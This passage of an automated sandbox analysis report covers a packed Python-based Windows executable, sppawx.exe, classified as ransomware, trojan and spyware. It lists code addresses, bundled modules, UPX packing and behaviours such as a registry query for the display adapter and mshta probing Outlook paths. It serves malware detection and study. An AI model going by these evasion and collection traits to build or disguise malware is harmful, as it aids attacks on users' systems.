              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3219B40_2_00007FF79A3219B4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3221D40_2_00007FF79A3221D4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A32DACC0_2_00007FF79A32DACC
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A32DF600_2_00007FF79A32DF60
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3288040_2_00007FF79A328804
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3397980_2_00007FF79A339798
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3217B00_2_00007FF79A3217B0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A321FD00_2_00007FF79A321FD0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3198700_2_00007FF79A319870
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3318E40_2_00007FF79A3318E4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31AD1D0_2_00007FF79A31AD1D
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A32E5E00_2_00007FF79A32E5E0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3236100_2_00007FF79A323610
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A325DA00_2_00007FF79A325DA0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A321DC40_2_00007FF79A321DC4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A335EEC0_2_00007FF79A335EEC
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A329F100_2_00007FF79A329F10
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3369D42_2_00007FF79A3369D4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3110002_2_00007FF79A311000
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A31A34B2_2_00007FF79A31A34B
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A321BC02_2_00007FF79A321BC0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A318BD02_2_00007FF79A318BD0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A335C702_2_00007FF79A335C70
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A322C802_2_00007FF79A322C80
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A333C802_2_00007FF79A333C80
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3364882_2_00007FF79A336488
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3309382_2_00007FF79A330938
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A31A4E42_2_00007FF79A31A4E4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A33411C2_2_00007FF79A33411C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3309382_2_00007FF79A330938
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3281542_2_00007FF79A328154
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A323A142_2_00007FF79A323A14
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3219B42_2_00007FF79A3219B4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3221D42_2_00007FF79A3221D4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A32DACC2_2_00007FF79A32DACC
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A32DF602_2_00007FF79A32DF60
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3288042_2_00007FF79A328804
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3397982_2_00007FF79A339798
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3217B02_2_00007FF79A3217B0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A321FD02_2_00007FF79A321FD0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3198702_2_00007FF79A319870
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3318E42_2_00007FF79A3318E4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A31AD1D2_2_00007FF79A31AD1D
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A32E5E02_2_00007FF79A32E5E0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3236102_2_00007FF79A323610
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A325DA02_2_00007FF79A325DA0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A321DC42_2_00007FF79A321DC4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A335EEC2_2_00007FF79A335EEC
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A329F102_2_00007FF79A329F10
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCC35DC02_2_00007FFEDCC35DC0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCCB72002_2_00007FFEDCCB7200
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCC3DE302_2_00007FFEDCC3DE30
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCC1BD802_2_00007FFEDCC1BD80
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCBF15412_2_00007FFEDCBF1541
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCBF15912_2_00007FFEDCBF1591
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCBF21F32_2_00007FFEDCBF21F3
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCBF15552_2_00007FFEDCBF1555
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCBF1FE62_2_00007FFEDCBF1FE6
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCC399A02_2_00007FFEDCC399A0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCC3D9602_2_00007FFEDCC3D960
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCBF13DE2_2_00007FFEDCBF13DE
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD239DB02_2_00007FFEDD239DB0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD238C982_2_00007FFEDD238C98
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2385942_2_00007FFEDD238594
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2607902_2_00007FFEDD260790
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2399B42_2_00007FFEDD2399B4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD235A982_2_00007FFEDD235A98
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD23BADC2_2_00007FFEDD23BADC
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2352C42_2_00007FFEDD2352C4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2712202_2_00007FFEDD271220
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2871202_2_00007FFEDD287120
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD273AD02_2_00007FFEDD273AD0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2A8CF02_2_00007FFEDD2A8CF0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD3118502_2_00007FFEDD311850
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2B0A502_2_00007FFEDD2B0A50
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD309A702_2_00007FFEDD309A70
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2A82902_2_00007FFEDD2A8290
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD29FD602_2_00007FFEDD29FD60
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD296D422_2_00007FFEDD296D42
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BB540103_2_00007FF6256BB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256B1884103_2_00007FF6256B1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256B82F0103_2_00007FF6256B82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C1180103_2_00007FF6256C1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C54C0103_2_00007FF6256C54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256DAE10103_2_00007FF6256DAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E7B24103_2_00007FF6256E7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C0A2C103_2_00007FF6256C0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BABA0103_2_00007FF6256BABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6257186D4103_2_00007FF6257186D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625707660103_2_00007FF625707660
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256EA710103_2_00007FF6256EA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F0710103_2_00007FF6256F0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F2700103_2_00007FF6256F2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C86C4103_2_00007FF6256C86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256DF5B0103_2_00007FF6256DF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256EF59C103_2_00007FF6256EF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C8598103_2_00007FF6256C8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62570260C103_2_00007FF62570260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E65FC103_2_00007FF6256E65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6257018A8103_2_00007FF6257018A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C2890103_2_00007FF6256C2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256B8884103_2_00007FF6256B8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256ED91C103_2_00007FF6256ED91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F190C103_2_00007FF6256F190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E0904103_2_00007FF6256E0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E38E8103_2_00007FF6256E38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D67E0103_2_00007FF6256D67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C17C8103_2_00007FF6256C17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F02A4103_2_00007FF6256F02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625702268103_2_00007FF625702268
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BF24C103_2_00007FF6256BF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D7244103_2_00007FF6256D7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62570832C103_2_00007FF62570832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625701314103_2_00007FF625701314
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256B42E0103_2_00007FF6256B42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CD2C0103_2_00007FF6256CD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6257141CC103_2_00007FF6257141CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F2164103_2_00007FF6256F2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CE21C103_2_00007FF6256CE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F81CC103_2_00007FF6256F81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F5468103_2_00007FF6256F5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256DD458103_2_00007FF6256DD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BA504103_2_00007FF6256BA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E0374103_2_00007FF6256E0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C2360103_2_00007FF6256C2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256DC3E0103_2_00007FF6256DC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256FEEA4103_2_00007FF6256FEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BCE84103_2_00007FF6256BCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C8E68103_2_00007FF6256C8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256FAE50103_2_00007FF6256FAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256EAF0C103_2_00007FF6256EAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256B9EFC103_2_00007FF6256B9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62570FE74103_2_00007FF62570FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F9D74103_2_00007FF6256F9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BEE08103_2_00007FF6256BEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C1E04103_2_00007FF6256C1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625701DCC103_2_00007FF625701DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6257100F0103_2_00007FF6257100F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E0074103_2_00007FF6256E0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256DC05C103_2_00007FF6256DC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E8040103_2_00007FF6256E8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D0104103_2_00007FF6256D0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62571DFD8103_2_00007FF62571DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E5F4C103_2_00007FF6256E5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C3030103_2_00007FF6256C3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256EC00C103_2_00007FF6256EC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F4FE8103_2_00007FF6256F4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62571AF90103_2_00007FF62571AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62571AAC0103_2_00007FF62571AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F5A70103_2_00007FF6256F5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256EFA6C103_2_00007FF6256EFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BCB14103_2_00007FF6256BCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256DD97C103_2_00007FF6256DD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F69FD103_2_00007FF6256F69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256B49B8103_2_00007FF6256B49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F5C8C103_2_00007FF6256F5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256E0D20103_2_00007FF6256E0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625706D0C103_2_00007FF625706D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D9D0C103_2_00007FF6256D9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256BDD04103_2_00007FF6256BDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F4B38103_2_00007FF6256F4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C8C30103_2_00007FF6256C8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625709B98103_2_00007FF625709B98
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDD23DAF8 appears 45 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDCC6CDA1 appears 312 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDCBF132A appears 151 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FF79A312710 appears 104 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDD23DC28 appears 68 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDD2794D8 appears 35 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDD279570 appears 163 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FFEDCC6CD8F appears 87 times
              Source: C:\Users\user\Desktop\sppawx.exeCode function: String function: 00007FF79A312910 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: String function: 00007FF6256F49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: String function: 00007FF6256C8444 appears 48 times
              Source: sppawx.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: sppawx.exeBinary or memory string: OriginalFilename vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedasHost.exej% vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs sppawx.exe
              Source: sppawx.exeBinary or memory string: OriginalFilename vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1755955148.00007FFEE6F34000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1756200945.00007FFEEAFE4000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1755121226.00007FFEDE1E2000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1755625045.00007FFEE44EC000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1757331507.00007FFEF5CF7000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1752845475.00007FFEDD433000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1754087915.00007FFEDD939000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1756436780.00007FFEECECC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedasHost.exej% vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1755334189.00007FFEDE6B8000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1751258096.00007FFEDCBEA000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs sppawx.exe
              Source: sppawx.exe, 00000002.00000002.1756674174.00007FFEED7AC000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs sppawx.exe
              Source: sppawx.exeBinary or memory string: OriginalFilenamedasHost.exej% vs sppawx.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994210643762751
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971739243943192
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942978533094812
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@198/57@4/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CCAFC GetLastError,FormatMessageW,103_2_00007FF6256CCAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,103_2_00007FF6256FB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,103_2_00007FF6256CEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D3144 GetDiskFreeSpaceExW,103_2_00007FF6256D3144
